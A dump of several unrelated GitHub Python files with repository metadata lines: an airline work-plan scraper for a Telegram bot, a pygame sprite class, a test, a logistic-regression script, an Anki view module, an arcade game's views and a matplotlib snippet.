'refer': 'https://edu.rossiya-airlines.com//',
'login': '1',
'user_id': '',
'backend_url': 'https://sup.rossiya-airlines.com:8080',
'username': dict_users.users[157758328]['tab_number'],
'userpass': dict_users.users[157758328]['password'],
'domain': 'stc.local',
'submit': 'войти'
} # TODO ПРОВЕРЬ ПРИНТЫ ЛОГИН И ПАРОЛЬ!!!!!!!!!!!!!!!!!!!!!!!!!
try:
radar = s.post(url, data=data, headers=dict(Referer=url))
print(radar)
except Exception as exc: # ConnectionResetError(10054, 'Удаленный хост принудительно разорвал существующее подключение'
exception_logger.writer(exc=exc, request=url, user_id=dict_users.users[user_id])
return
soup = BeautifulSoup(radar.content, 'html.parser')
print(soup.text)
radar.close() # TODO проверить помогает ли это устртанить ошибку
events = soup.select('.table.table-striped.table-hover.table-bordered.sorting3.dataTable.no-footer')
print(events.text)
try:
table = events[0]
except Exception as exc:
error = f"Проблема с получением "
exception_logger.writer(exc=exc, request='парсинг плана', user_id=dict_users.users[user_id],
answer='неверный логин и пароль')
return error
tbody = table.contents[1]
rows = tbody.contents
output_info = 'Ваш ближайший план работ:\n'
string_copy = None
# for tr in rows:
# string1 = False
# cells = tr.contents
# day_month_start = cells[1].text[:5]
# msk_start = cells[2].text
# utc_start = cells[3].text
# flight_number = cells[4].text
# aircraft = cells[5].text
# route_arrive_time = cells[6].text
# destination = cells[6].text.split(' ')[0].title()
# # print(tr)
# if utc_start == '':
# time_start = '00:00'
# else:
# time_start = utc_start # eval(dict_users.users[user_id]['time_depart'])
# time_zona = dict_users.users[user_id]['time_depart'][:3]
#
# depart_utc_dt = f"{day_month_start} {time_start}"
#
# if dict_users.users[user_id]['time_depart'] == 'msk_start':
# dt_object = datetime.strptime(depart_utc_dt, '%d.%m %H:%M').replace(tzinfo=pytz.utc)
# start_dt = dt_object.astimezone(pytz.utc) + timedelta(hours=3)
# day = start_dt.strftime('%d')
# month = start_dt.strftime('%m')
# hour = start_dt.strftime('%H')
# minute = start_dt.strftime('%M')
# start_dt = f'{day}.{month} {hour}:{minute}'
# else:
# start_dt = depart_utc_dt
#
#
#
#
# if output_info == 'Ваш ближайший план работ:\n':
# return 'Рейсов на ближайшее время не найдено.'
# if len(start_dt) == 11:
# if output_info != 'Ваш ближайший план работ:\n':
# output_info += f' {time_zona.upper()} MSK\n'
#
# # print(output_info)
# return "<pre>" + output_info + "</pre>"
parser()
| azarovdimka/python | telebot/opensky_radar.py | opensky_radar.py | py | 4,338 | python | ru | code | 1 | github-code | 13 |
22477365648 | from pygame import *
from animations import *
class trainer():
def __init__(self, x, y, width, height):
# Pos. attributes
self.x = x
self.y = y
self.width = width
self.height = height
self.vel = 5
# Attributes for walk direction
self.left = False
self.right = False
self.up = False
self.down = False
self.walkCount = 0
def draw(self, win):
walkComplement = 3 #This is the divisor of the walkCount index
if self.walkCount + 1 >= 12:
self.walkCount = 0
elif self.right:
win.blit(playerAnimations.walkMCRight[self.walkCount // walkComplement], (self.x, self.y))
self.walkCount += 1
elif self.left:
win.blit(playerAnimations.walkMCLeft[self.walkCount // walkComplement], (self.x, self.y))
self.walkCount += 1
elif self.up:
win.blit(playerAnimations.walkMCUp[self.walkCount // walkComplement], (self.x, self.y))
self.walkCount += 1
elif self.down:
win.blit(playerAnimations.walkMCDown[self.walkCount // walkComplement], (self.x, self.y))
self.walkCount += 1
else:
if self.right:
win.blit(playerAnimations.standingMCseries[3], (self.x, self.y))
elif self.up:
win.blit(playerAnimations.standingMCseries[1], (self.x, self.y))
elif self.down:
win.blit(playerAnimations.standingMCseries[0], (self.x, self.y))
else:
win.blit(playerAnimations.standingMCseries[2], (self.x, self.y)) | KarlMarkFuncion/Portfolio_1 | objectPlayers.py | objectPlayers.py | py | 1,709 | python | en | code | 1 | github-code | 13 |
6142009976 | import microgp4 as ugp
def test_make_shared_parameter():
for p in [
ugp.f.integer_parameter(0, 10_000_000),
ugp.f.float_parameter(0, 1.0),
ugp.f.choice_parameter(range(10_000)),
ugp.f.array_parameter("01X", 256),
]:
SharedParameter = ugp.f.make_shared_parameter(p)
shared_param1 = SharedParameter()
shared_param2 = SharedParameter()
assert shared_param1.value == shared_param2.value
tmp = shared_param1.value
shared_param1.mutate(1)
assert shared_param1.value == shared_param2.value
assert shared_param1.value != tmp
SharedParameter2 = ugp.f.make_shared_parameter(p)
shared_param3 = SharedParameter2()
tmp2 = shared_param3.value
shared_param3.mutate()
assert shared_param3.value != tmp2
assert shared_param1.value != shared_param3.value
assert shared_param2.value != shared_param3.value
| microgp/microgp4 | test/microgp4/framework/_test_shared.py | _test_shared.py | py | 954 | python | en | code | 27 | github-code | 13 |
73539328338 | import numpy as np
import learning
import random
import time
positiveLabel = learning.positiveLabel
negativeLabel = learning.negativeLabel
data = "../common/cancer/wdbc.data"
def main():
startTime = time.time()
X, Y = load_data()
classifier, iters, error, (precision, recall, f1) = learning.learn(X, Y)
print("Best L: {0}".format(iters))
print("Test set error: {0}".format(error))
print("Precision: {0}".format(precision))
print("Recall: {0}".format(recall))
print("F1 score: {0}".format(f1))
endTime = time.time()
print("Done working in {0} seconds".format(endTime - startTime))
def load_data():
xs, ys = [], []
lines = []
for line in open(data, "r"):
lines.append(line)
random.shuffle(lines)
for line in lines:
tokens = line.split(",")
y = positiveLabel if tokens[1] == 'M' else negativeLabel
x = np.array(list(map(float, tokens[2:])))
xs.append(x)
ys.append(y)
return xs, ys
main() | anton-bannykh/ml-2013 | artem.vasilyev/lab4-logistic/main.py | main.py | py | 1,009 | python | en | code | 4 | github-code | 13 |
24511360921 | from PyQt4.QtGui import *
from PyQt4.QtCore import *
import anki, anki.utils
from anki.sound import playFromText, stripSounds
from anki.latex import renderLatex, stripLatex
from anki.utils import stripHTML
from anki.hooks import runHook, runFilter
import types, time, re, os, urllib, sys, difflib
from ankiqt import ui
from ankiqt.ui.utils import mungeQA, getBase
from anki.utils import fmtTimeSpan
from PyQt4.QtWebKit import QWebPage, QWebView
failedCharColour = "#FF0000"
passedCharColour = "#00FF00"
futureWarningColour = "#FF0000"
# Views - define the way a user is prompted for questions, etc
##########################################################################
class View(object):
"Handle the main window update as we transition through various states."
def __init__(self, parent, body, frame=None):
self.main = parent
self.body = body
self.frame = frame
self.main.connect(self.body, SIGNAL("loadFinished(bool)"),
self.onLoadFinished)
# State control
##########################################################################
def setState(self, state):
"Change to STATE, and update the display."
self.oldState = getattr(self, 'state', None)
self.state = state
if self.state == "initial":
return
elif self.state == "noDeck":
self.clearWindow()
self.drawWelcomeMessage()
self.flush()
return
self.redisplay()
def redisplay(self):
"Idempotently display the current state (prompt for question, etc)"
if self.state == "noDeck" or self.state == "studyScreen":
return
self.clearWindow()
self.haveTop = (self.main.lastCard and (
self.main.config['showLastCardContent'] or
self.main.config['showLastCardInterval'])) or (
self.needFutureWarning())
self.drawRule = (self.main.config['qaDivider'] and
self.main.currentCard and
not self.main.currentCard.cardModel.questionInAnswer)
if not self.main.deck.isEmpty():
if self.haveTop:
self.drawTopSection()
if self.state == "showQuestion":
self.setBackground()
self.drawQuestion()
if self.drawRule:
self.write("<hr>")
elif self.state == "showAnswer":
self.setBackground()
if not self.main.currentCard.cardModel.questionInAnswer:
self.drawQuestion(nosound=True)
if self.drawRule:
self.write("<hr>")
self.drawAnswer()
elif self.state == "deckEmpty":
self.drawWelcomeMessage()
elif self.state == "deckFinished":
self.drawDeckFinishedMessage()
self.flush()
def addStyles(self):
# card styles
s = "<style>\n"
if self.main.deck:
s += self.main.deck.css
s += "div { white-space: pre-wrap; }"
s += "</style>"
return s
def clearWindow(self):
self.body.setHtml("")
self.buffer = ""
def setBackground(self):
col = self.main.currentCard.cardModel.lastFontColour
self.write("<style>html { background: %s;}</style>" % col)
# Font properties & output
##########################################################################
def flush(self):
"Write the current HTML buffer to the screen."
self.buffer = self.addStyles() + self.buffer
# hook for user css
runHook("preFlushHook")
self.buffer = '''<html><head>%s</head><body>%s</body></html>''' % (
getBase(self.main.deck), self.buffer)
#print self.buffer.encode("utf-8")
self.body.setHtml(self.buffer)
def write(self, text):
if type(text) != types.UnicodeType:
text = unicode(text, "utf-8")
self.buffer += text
# Question and answer
##########################################################################
def center(self, str, height=40):
if not self.main.config['splitQA']:
return "<center>" + str + "</center>"
return '''\
<center><div style="display: table; height: %s%%; width:100%%; overflow: hidden;">\
<div style="display: table-cell; vertical-align: middle;">\
<div style="">%s</div></div></div></center>''' % (height, str)
def drawQuestion(self, nosound=False):
"Show the question."
if not self.main.config['splitQA']:
self.write("<br>")
q = self.main.currentCard.htmlQuestion()
if self.haveTop:
height = 35
else:
height = 45
q = runFilter("drawQuestion", q)
self.write(self.center(self.mungeQA(self.main.deck, q), height))
if self.state != self.oldState and not nosound:
playFromText(q)
def correct(self, a, b):
if b == "":
return "";
ret = "";
s = difflib.SequenceMatcher(None, b, a)
sz = self.main.currentCard.cardModel.answerFontSize
ok = "background: %s; color: #000; font-size: %dpx" % (
passedCharColour, sz)
bad = "background: %s; color: #000; font-size: %dpx;" % (
failedCharColour, sz)
for tag, i1, i2, j1, j2 in s.get_opcodes():
if tag == "equal":
ret += ("<span style='%s'>%s</span>" % (ok, b[i1:i2]))
elif tag == "replace":
ret += ("<span style='%s'>%s</span>"
% (bad, b[i1:i2] + (" " * ((j2 - j1) - (i2 - i1)))))
elif tag == "delete":
ret += ("<span style='%s'>%s</span>" % (bad, b[i1:i2]))
elif tag == "insert":
ret += ("<span style='%s'>%s</span>" % (bad, " " * (j2 - j1)))
return ret
def drawAnswer(self):
"Show the answer."
a = self.main.currentCard.htmlAnswer()
a = runFilter("drawAnswer", a)
if self.main.currentCard.cardModel.typeAnswer:
try:
cor = stripHTML(self.main.currentCard.fact[
self.main.currentCard.cardModel.typeAnswer])
except KeyError:
self.main.currentCard.cardModel.typeAnswer = ""
cor = ""
if cor:
given = unicode(self.main.typeAnswerField.text())
res = self.correct(cor, given)
a = res + "<br>" + a
self.write(self.center('<span id=answer />'
+ self.mungeQA(self.main.deck, a)))
if self.state != self.oldState:
playFromText(a)
def mungeQA(self, deck, txt):
txt = mungeQA(deck, txt)
# hack to fix thai presentation issues
if self.main.config['addZeroSpace']:
txt = txt.replace("</span>", "​</span>")
return txt
def onLoadFinished(self):
if self.state == "showAnswer":
if self.main.config['scrollToAnswer']:
mf = self.body.page().mainFrame()
mf.evaluateJavaScript("location.hash = 'answer'")
# Top section
##########################################################################
def drawTopSection(self):
"Show previous card, next scheduled time, and stats."
self.buffer += "<center>"
self.drawFutureWarning()
self.drawLastCard()
self.buffer += "</center>"
def needFutureWarning(self):
if not self.main.currentCard:
return
if self.main.currentCard.due <= time.time():
return
if self.main.currentCard.due - time.time() <= self.main.deck.delay0:
return
return True
def drawFutureWarning(self):
if not self.needFutureWarning():
return
self.write("<span style='color: %s'>" % futureWarningColour +
_("This card was due in %s.") % fmtTimeSpan(
self.main.currentCard.due - time.time()) +
"</span>")
def drawLastCard(self):
"Show the last card if not the current one, and next time."
if self.main.lastCard:
if self.main.config['showLastCardContent']:
if (self.state == "deckFinished" or
self.main.currentCard.id != self.main.lastCard.id):
q = self.main.lastCard.question.replace("<br>", " ")
q = stripHTML(q)
if len(q) > 50:
q = q[:50] + "..."
a = self.main.lastCard.answer.replace("<br>", " ")
a = stripHTML(a)
if len(a) > 50:
a = a[:50] + "..."
s = "%s<br>%s" % (q, a)
s = stripLatex(s)
self.write('<span class="lastCard">%s</span><br>' % s)
if self.main.config['showLastCardInterval']:
if self.main.lastQuality > 1:
msg = _("Well done! This card will appear again in "
"<b>%(next)s</b>.") % \
{"next":self.main.lastScheduledTime}
else:
msg = _("This card will appear again later.")
self.write(msg)
self.write("<br>")
# Welcome/empty/finished deck messages
##########################################################################
def drawWelcomeMessage(self):
self.main.mainWin.welcomeText.setText("""\
<h1>%(welcome)s</h1>
<p>
<table>
<tr>
<td width=50>
<a href="welcome:addfacts"><img src=":/icons/list-add.png"></a>
</td>
<td valign=middle><h1><a href="welcome:addfacts">%(add)s</a></h1>
%(start)s</td>
</tr>
</table>
<br>
<table>
<tr>
<td width=50>
<a href="welcome:back"><img src=":/icons/go-previous.png"></a>
</td>
<td valign=middle><h2><a href="welcome:back">%(back)s</a></h2></td>
</tr>
</table>""" % \
{"welcome":_("Welcome to Anki!"),
"add":_("Add Material"),
"start":_("Start adding your own material."),
"back":_("Back to Deck Browser"),
})
def drawDeckFinishedMessage(self):
"Tell the user the deck is finished."
self.main.mainWin.congratsLabel.setText(
self.main.deck.deckFinishedMsg())
class AnkiWebView(QWebView):
def __init__(self, *args):
QWebView.__init__(self, *args)
self.setObjectName("mainText")
def keyPressEvent(self, evt):
if evt.matches(QKeySequence.Copy):
self.triggerPageAction(QWebPage.Copy)
evt.accept()
evt.ignore()
def contextMenuEvent(self, evt):
QWebView.contextMenuEvent(self, evt)
def dropEvent(self, evt):
pass
| scout-zz/ankiqt | ankiqt/ui/view.py | view.py | py | 10,795 | python | en | code | 4 | github-code | 13 |
2872516640 | import math
from django.db.models import Max, Min
from shop.filters.filters import ManufacturerFilter, PriceFilter, DimensionFilter
filter_mapping = {
'producer': ManufacturerFilter,
'price': PriceFilter,
'height': DimensionFilter,
'width': DimensionFilter,
'depth': DimensionFilter
}
def get_values_ranges(min_value, max_value, total_count):
""" Return list of ranges, such as ['0 - 99', '100 - 199'] etc.
"""
result = []
# values = set(int(value) for value in get_clean_values_list(values))
if total_count:
number_of_ranges = int(1 + 3.322 * math.log10(total_count))
step = round((max_value - min_value) / number_of_ranges)
for i in range(number_of_ranges):
if i == number_of_ranges - 1 or step <= 1:
result.append(f"{min_value}-{max_value}")
break
else:
result.append(f"{min_value}-{min_value + step-1}")
min_value += step
return result
def get_value_and_counts(object_list, values_list, value_name):
"""
:param object_list: queryset of objects that have price attribute
:param values_list: list of values ranges ex. ['200-400', '400-600', ...]
:param value_name: name of value for which ranges are determined
:return: list of tuples(value_range, number of objects that have value in value_range)
"""
if values_list:
if object_list:
return [(value, object_list.filter(filter_mapping[value_name](
{'name': value_name, 'value': value}
).build_filter_condition()).count()) for value in values_list]
else:
return [(value, 0) for value in values_list]
def get_filters(data: dict):
filters = [filter_mapping[param]({'name': param, 'value': value}).build_filter_condition()
for param, value in data.items() if data[param]]
return filters
def get_price_range(object_list):
max_price = int(object_list.aggregate(Max('price'))['price__max'])
min_price = int(object_list.aggregate(Min('price'))['price__min'])
return min_price, max_price
| slavkoBV/MebliLem | myshop/shop/filters/filters_utils.py | filters_utils.py | py | 2,131 | python | en | code | 1 | github-code | 13 |
21985738669 | import cv2
#Récupération de l'image
img = cv2.imread('Images/Mars_surface.pbm')
isize = img.shape #Propriétés de l'images
vPixMax = 0
vPix = 0
compteur = 0
tauxHumidité = 0
for i in range(0, isize[0]):
for j in range(0, isize[1]):
vPix = vPix + img[i][j]
compteur = compteur +1
vPixMax = compteur *255
##Principe de la densité : M / V ==> Moyenne
tauxHumidité = vPix / vPixMax
print("TauxHumidité :", tauxHumidité)
cv2.imshow('Surface de Mars',img)
cv2.waitKey(0)
cv2.destroyAllWindows() | Eager31/Projet-ExoLife | MissionA2.py | MissionA2.py | py | 524 | python | fr | code | 0 | github-code | 13 |
18484735844 | import time
import arcade
from typing import List, Tuple
import constants as c
import mapdata
import player
import isometric
import ui
import turn
import interaction
from bot import create_bot
class Mouse(arcade.Sprite):
def __init__(self, window):
super().__init__("assets/ui/cursor.png", c.SPRITE_SCALE)
self._points = (-22.5, 22.5), (-22, 22.5), (-22, 22), (-22.5, 22)
self.window = window
self.rel_x = 0
self.rel_y = 0
self.e_x = 0
self.e_y = 0
def _get_center_x(self) -> float:
""" Get the center x coordinate of the sprite. """
return self._position[0]
def _set_center_x(self, new_value: float):
""" Set the center x coordinate of the sprite. """
if new_value != self._position[0]:
self.rel_x = new_value - self.window.view_x
self.clear_spatial_hashes()
self._point_list_cache = None
self._position = (new_value, self._position[1])
self.add_spatial_hashes()
for sprite_list in self.sprite_lists:
sprite_list.update_location(self)
center_x = property(_get_center_x, _set_center_x)
def _get_center_y(self) -> float:
""" Get the center y coordinate of the sprite. """
return self._position[1]
def _set_center_y(self, new_value: float):
""" Set the center y coordinate of the sprite. """
if new_value != self._position[1]:
self.rel_y = new_value - self.window.view_y
self.clear_spatial_hashes()
self._point_list_cache = None
self._position = (self._position[0], new_value)
self.add_spatial_hashes()
for sprite_list in self.sprite_lists:
sprite_list.update_location(self)
center_y = property(_get_center_y, _set_center_y)
class TemporumWindow(arcade.Window):
"""
The Game Window, This holds the view and any constant variables as this will always be the same object.
"""
def __init__(self):
super().__init__(c.SCREEN_WIDTH, c.SCREEN_HEIGHT, c.WINDOW_NAME, fullscreen=c.FULL_SCREEN)
arcade.set_background_color(arcade.color.BLACK)
# View data
self._view_x = c.round_to_x(-c.SCREEN_WIDTH / 2, 5 * c.SPRITE_SCALE)
self._view_y = c.round_to_x(-c.SCREEN_HEIGHT / 2, 5 * c.SPRITE_SCALE)
# Mouse
self.set_mouse_visible(False)
self.mouse = Mouse(self)
# The Views
self.game = GameView()
self.title = TitleView()
self.end = EndView()
# Always start with the title
self.show_view(self.title)
def restart(self):
c.restart()
self.game = GameView()
self.title = TitleView()
self.end = EndView()
self.show_view(self.title)
def show_end(self):
self.show_view(self.end)
def on_key_press(self, symbol: int, modifiers: int):
# At all times the ESCAPE key will close the game.
if symbol == arcade.key.ESCAPE:
self.close()
elif symbol == arcade.key.TAB:
self.show_view(PauseMenu())
self.minimize()
def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):
self.mouse.center_x = c.round_to_x(self.view_x + x + self.mouse.width / 2, 3)
self.mouse.center_y = c.round_to_x(self.view_y + y - self.mouse.height / 2, 3)
y_mod = ((160 - c.FLOOR_TILE_THICKNESS) * c.SPRITE_SCALE)
self.mouse.e_x, self.mouse.e_y = isometric.cast_from_iso(self.view_x + x, self.view_y + y + y_mod)
@property
def view_x(self):
return self._view_x
@view_x.setter
def view_x(self, value):
self._view_x = value
self.mouse.center_x = value + self.mouse.rel_x
@property
def view_y(self):
return self._view_y
@view_y.setter
def view_y(self, value):
self._view_y = value
self.mouse.center_y = value + self.mouse.rel_y
class PauseMenu(arcade.View):
def on_draw(self):
arcade.start_render()
arcade.draw_text("GAME PAUSED. PRESS ANY KEY TO CONTINUE",
self.window.view_x + self.window.width/2,
self.window.view_y + self.window.height/2,
arcade.color.WHITE, anchor_x="center", anchor_y="center", align="center",
font_size=24)
def on_key_press(self, symbol: int, modifiers: int):
self.window.show_view(self.window.game)
class EndView(arcade.View):
def __init__(self):
super().__init__()
self.slides = ["You walk Through the Door into a dusty and dark hallway\n"
"Something moves in the dark in front of you.\n"
"A dark skinned man in his late 20's looks up at you\n"
"You couldn't see him due to his black clothing\n"
"'Who the Hell Are you?!' he shouts.\n"
"Press Any key To Continue.",
"Press Any key To Continue"]
self.current_slide = 0
self.slide_images = [arcade.Sprite("assets/final_scene_hooded_figure.png", c.SPRITE_SCALE,
center_x=c.SCREEN_WIDTH//2, center_y=c.SCREEN_HEIGHT//2-50*c.SPRITE_SCALE),
arcade.Sprite("assets/final_scene_demo_end.png", c.SPRITE_SCALE,
center_x=c.SCREEN_WIDTH//2, center_y=c.SCREEN_HEIGHT//2-50*c.SPRITE_SCALE),
None, None]
self.current_image = self.slide_images[self.current_slide]
def on_show(self):
c.stop_music()
self.window.set_viewport(0, c.SCREEN_WIDTH, 0, c.SCREEN_HEIGHT)
self.current_slide = 0
self.current_image = self.slide_images[self.current_slide]
def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):
self.current_slide += 1
if self.current_slide < len(self.slides):
self.current_image = self.slide_images[self.current_slide]
else:
self.window.restart()
def on_key_press(self, symbol: int, modifiers: int):
self.current_slide += 1
if self.current_slide < len(self.slides):
self.current_image = self.slide_images[self.current_slide]
else:
self.window.restart()
def on_draw(self):
arcade.start_render()
if self.current_image is not None:
self.current_image.draw()
current_text = self.slides[self.current_slide]
arcade.draw_text(current_text, c.SCREEN_WIDTH//2, c.SCREEN_HEIGHT-75*c.SPRITE_SCALE, arcade.color.WHITE,
anchor_y='top', anchor_x='center', align='center', font_size=24)
class GameView(arcade.View):
"""
The GameView is the real game, it is where the gameplay will take place.
"""
def __init__(self):
self.window: TemporumWindow
super().__init__()
# Turn System
self.turn_handler = turn.TurnHandler([], self)
# The Current Ai info
self.current_ai = []
# The player info
self.player = player.Player(25, 25, self)
self.turn_handler.new_action_handlers([self.player.action_handler])
c.iso_append(self.player)
c.set_player(self.player)
# Map Handler
self.map_handler = mapdata.MapHandler(self)
self.map_handler.load_map()
# Setting player grid now that the map_handler has been initialised.
self.player.set_grid(self.map_handler.full_map)
# Conversation Handler
self.convo_handler = interaction.load_conversation()
# Mouse Select
self.select_tile = player.Select(0, 0)
c.iso_append(self.select_tile)
self.selected_tile: player.Selected = None
self.action_tab = ui.ActionTab(self)
# Ui Stuff
self.ui_elements = arcade.SpriteList()
self.tabs = (ui.TalkTab(self),)
self.tabs[0].center_x = c.round_to_x(self.window.view_x + c.SCREEN_WIDTH // 2, 5 * c.SPRITE_SCALE)
self.tabs[0].center_y = c.round_to_x(self.window.view_y + c.SCREEN_HEIGHT // 2, 5 * c.SPRITE_SCALE)
self.pressed = None
self.ui_tabs_over = []
# keys for held checks
self.shift = False
# Debugging tools
self.test_list = arcade.SpriteList()
# player action data
self.selected_action = 'move'
self.pending_action = None
self.current_handler = None
# View code
self.motion = False
self.motion_start = 0
self.motion_length = 1.10
self.pending_motion: List[Tuple[float, float]] = []
self.current_motion = None
self.current_motion_start: Tuple[float, float] = (self.window.view_x, self.window.view_y)
# Last action: reorder the shown isometric sprites
c.iso_changed()
# set view port
def move_view(self, dx, dy):
# Round to fit the pixels of sprites
rx = c.round_to_x(dx, 5 * c.SPRITE_SCALE)
ry = c.round_to_x(dy, 5 * c.SPRITE_SCALE)
# move the view by this amount
self.window.view_x -= rx
self.window.view_y -= ry
# Move the ui and set the viewport.
self.ui_elements.move(-rx, -ry)
arcade.set_viewport(self.window.view_x, self.window.view_x + c.SCREEN_WIDTH,
self.window.view_y, self.window.view_y + c.SCREEN_HEIGHT)
def set_view(self, x, y):
# find the change x and y then round to fit the pixels of sprites
dx = c.round_to_x(x - self.window.view_x, 5 * c.SPRITE_SCALE)
dy = c.round_to_x(y - self.window.view_y, 5 * c.SPRITE_SCALE)
# Set the view to the rounded inputs
self.window.view_x = c.round_to_x(x, 5 * c.SPRITE_SCALE)
self.window.view_y = c.round_to_x(y, 5 * c.SPRITE_SCALE)
# Move the ui and set the viewport
self.ui_elements.move(dx, dy)
arcade.set_viewport(self.window.view_x, self.window.view_x + c.SCREEN_WIDTH,
self.window.view_y, self.window.view_y + c.SCREEN_HEIGHT)
def on_draw(self):
self.map_handler.map.vision_handler.draw_prep()
arcade.start_render()
c.GROUND_LIST.draw()
# Middle Shaders Between floor and other isometric sprites
if self.map_handler is not None:
self.map_handler.draw()
c.ISO_LIST.draw()
self.turn_handler.on_draw()
if self.pending_action is not None:
self.pending_action.draw()
for element in self.ui_elements:
element.draw()
self.action_tab.draw()
# Debugging of the map_handler
# self.map_handler.debug_draw(True)
self.map_handler.debug_draw()
self.window.mouse.draw()
def on_key_press(self, symbol: int, modifiers: int):
self.tabs[0].on_key_press(symbol, modifiers)
def on_update(self, delta_time: float):
# Debug FPS
# print(f"FPS: {1/delta_time}")
self.turn_handler.on_update(delta_time)
if self.current_handler != self.turn_handler.current_handler:
self.current_handler = self.turn_handler.current_handler
if self.current_handler is self.player.action_handler:
if self.selected_tile is not None:
self.selected_tile.new_pos(self.player.e_x, self.player.e_y)
self.action_tab.find_actions(self.player.e_x, self.player.e_y)
if self.turn_handler.current_handler != self.player.action_handler:
self.turn_handler.current_handler.actor.update()
if self.motion:
t = (time.time() - self.motion_start) / self.motion_length
if t >= 1:
self.set_view(*self.current_motion)
self.motion = False
else:
motion_diff = self.current_motion[0] - self.current_motion_start[0], \
self.current_motion[1] - self.current_motion_start[1]
adj_t = 2 * t
if adj_t < 1:
move = 0.5 * adj_t ** 3
else:
adj_t -= 2
move = 0.5 * (adj_t ** 3 + 2)
dx = self.current_motion_start[0] + (move * motion_diff[0])
dy = self.current_motion_start[1] + (move * motion_diff[1])
self.set_view(dx, dy)
elif len(self.pending_motion):
self.current_motion = self.pending_motion.pop(0)
if abs(self.current_motion[0] - self.window.view_x) > 15 and \
abs(self.current_motion[1] - self.window.view_y) > 15:
self.current_motion_start = (self.window.view_x, self.window.view_y)
self.motion_start = time.time()
self.motion = True
self.player.update_animation(delta_time)
for sprite in self.map_handler.map.animated_sprites:
sprite.update_animation(delta_time)
def on_show(self):
self.set_view(self.player.center_x - c.SCREEN_WIDTH / 2, self.player.center_y - c.SCREEN_HEIGHT / 2)
c.start_music()
def on_mouse_scroll(self, x: int, y: int, scroll_x: int, scroll_y: int):
direction = scroll_y/abs(scroll_y)
self.action_tab.on_scroll(direction)
def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):
y_mod = ((160 - c.FLOOR_TILE_THICKNESS) * c.SPRITE_SCALE)
e_x, e_y = isometric.cast_from_iso(self.window.view_x + x, self.window.view_y + y + y_mod)
self.ui_tabs_over = arcade.check_for_collision_with_list(self.window.mouse, self.ui_elements)
if 0 <= e_x < self.map_handler.map_width and 0 <= e_y < self.map_handler.map_height \
and not len(self.ui_tabs_over):
if e_x != self.select_tile.e_x or e_y != self.select_tile.e_y:
self.select_tile.new_pos(e_x, e_y)
c.iso_changed()
self.action_tab.on_mouse_motion(e_x, e_y)
elif self.player.e_x != self.select_tile.e_x or self.player.e_y != self.select_tile.e_y:
self.select_tile.new_pos(self.player.e_x, self.player.e_y)
c.iso_changed()
def on_mouse_drag(self, x: float, y: float, dx: float, dy: float, _buttons: int, _modifiers: int):
if _buttons == 2:
self.move_view(dx, dy)
if len(self.pending_motion):
self.pending_motion = []
self.current_motion = None
self.motion = False
elif _buttons == 1:
self.ui_tabs_over = arcade.check_for_collision_with_list(self.window.mouse, self.ui_elements)
if self.pressed is None and len(self.ui_tabs_over):
self.ui_tabs_over[-1].on_drag(dx, dy, (self.window.view_x + x, self.window.view_y + y))
self.pressed = self.ui_tabs_over[-1]
elif self.pressed is not None and self.pressed.pressed_button is None:
self.pressed.on_drag(dx, dy, (self.window.view_x + x, self.window.view_y + y))
def on_mouse_release(self, x: float, y: float, button: int,
modifiers: int):
if self.pressed is not None:
self.pressed.on_release((self.window.view_x + x, self.window.view_y + y))
self.pressed = None
def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):
select = False
if button == 1:
pressed = arcade.check_for_collision_with_list(self.window.mouse, self.ui_elements)
if len(pressed):
self.pressed: ui.Tab = pressed[-1]
self.pressed.on_press((self.window.view_x + x, self.window.view_y + y))
else:
select = True
elif button == 4:
select = True
if select:
self.action_tab.on_mouse_press(button)
if self.selected_tile is None:
self.selected_tile = player.Selected(self.select_tile.e_x, self.select_tile.e_y)
c.ISO_LIST.append(self.selected_tile)
else:
self.selected_tile.new_pos(self.select_tile.e_x, self.select_tile.e_y)
def new_bot(self, bot):
new_bot = create_bot(bot.x, bot.y, self.map_handler.full_map)
self.current_ai.append(new_bot)
if len(new_bot.animations):
self.map_handler.map.animated_sprites.append(new_bot)
c.iso_append(new_bot)
self.turn_handler.new_action_handlers([new_bot.action_handler])
def reset_bots(self):
self.turn_handler.remove_action_handlers(map(lambda bot: bot.action_handler, self.current_ai))
c.iso_strip(self.current_ai)
self.current_ai = []
def set_bots(self, bots):
self.turn_handler.new_action_handlers(map(lambda bot: bot.action_handler, self.current_ai))
self.current_ai = bots
class TitleView(arcade.View):
"""
The TitleView is the title
"""
def __init__(self):
super().__init__()
self.image = arcade.Sprite("assets/Title.png", c.SPRITE_SCALE,
center_x=c.SCREEN_WIDTH/2, center_y=c.SCREEN_HEIGHT/2)
self.state = 0
self.timer = 0
self.text = None
def on_draw(self):
arcade.start_render()
color = [255, 255, 255, 255]
alpha = 255
elapsed = time.time() - self.timer
def start_draw():
nonlocal alpha
t = elapsed/2.3 if elapsed else 0
if t <= 1:
alpha = 255*t
if self.text is None:
text = ("This Game is an Investigative Narrative.\n"
"\n"
"It is recommended that you have a set 10 to 15 minutes to play.\n"
"There is no saving. A pen and note pad is suggested.\n"
"\n"
"The Aim is to understand the story and to survive.\n"
"Pay attention, and watch your back.\n"
"\n"
"Press Any Key to Continue.")
self.text = arcade.draw_text(text, c.SCREEN_WIDTH // 2, c.SCREEN_HEIGHT // 2, tuple(color),
anchor_x="center", anchor_y="center", align="center", font_size=24)
else:
self.text.alpha = alpha
self.text.draw()
def wait_draw():
self.image.draw()
arcade.draw_text("Press anything to start",
c.SCREEN_WIDTH // 2,
c.SCREEN_HEIGHT // 2 - 25, tuple(color))
states = [start_draw, wait_draw]
if self.state < len(states):
states[self.state]()
else:
self.window.show_view(self.window.game)
def on_show(self):
self.state = 0
self.timer = time.time()
def on_key_press(self, symbol: int, modifiers: int):
if symbol == arcade.key.ENTER:
self.state += 1
self.timer = time.time()
def main():
window = TemporumWindow()
arcade.run()
| DragonMoffon/Temporum | views.py | views.py | py | 19,235 | python | en | code | 2 | github-code | 13 |
7188629605 | #T# the following code shows how to draw a circle to show examples of segments and lines of circles
#T# to draw a circle to show examples of segments and lines of circles, the pyplot module of the matplotlib package is used
import matplotlib.pyplot as plt
#T# the patches module of the matplotlib package is used to draw shapes
import matplotlib.patches as mpatches
#T# import the math module to do calculations
import math
#T# create the figure and axes
fig1, ax1 = plt.subplots(1, 1)
#T# set the aspect of the axes
ax1.set_aspect('equal', adjustable = 'datalim')
#T# hide the spines and ticks
for it1 in ['top', 'bottom', 'left', 'right']:
ax1.spines[it1].set_visible(False)
ax1.xaxis.set_visible(False)
ax1.yaxis.set_visible(False)
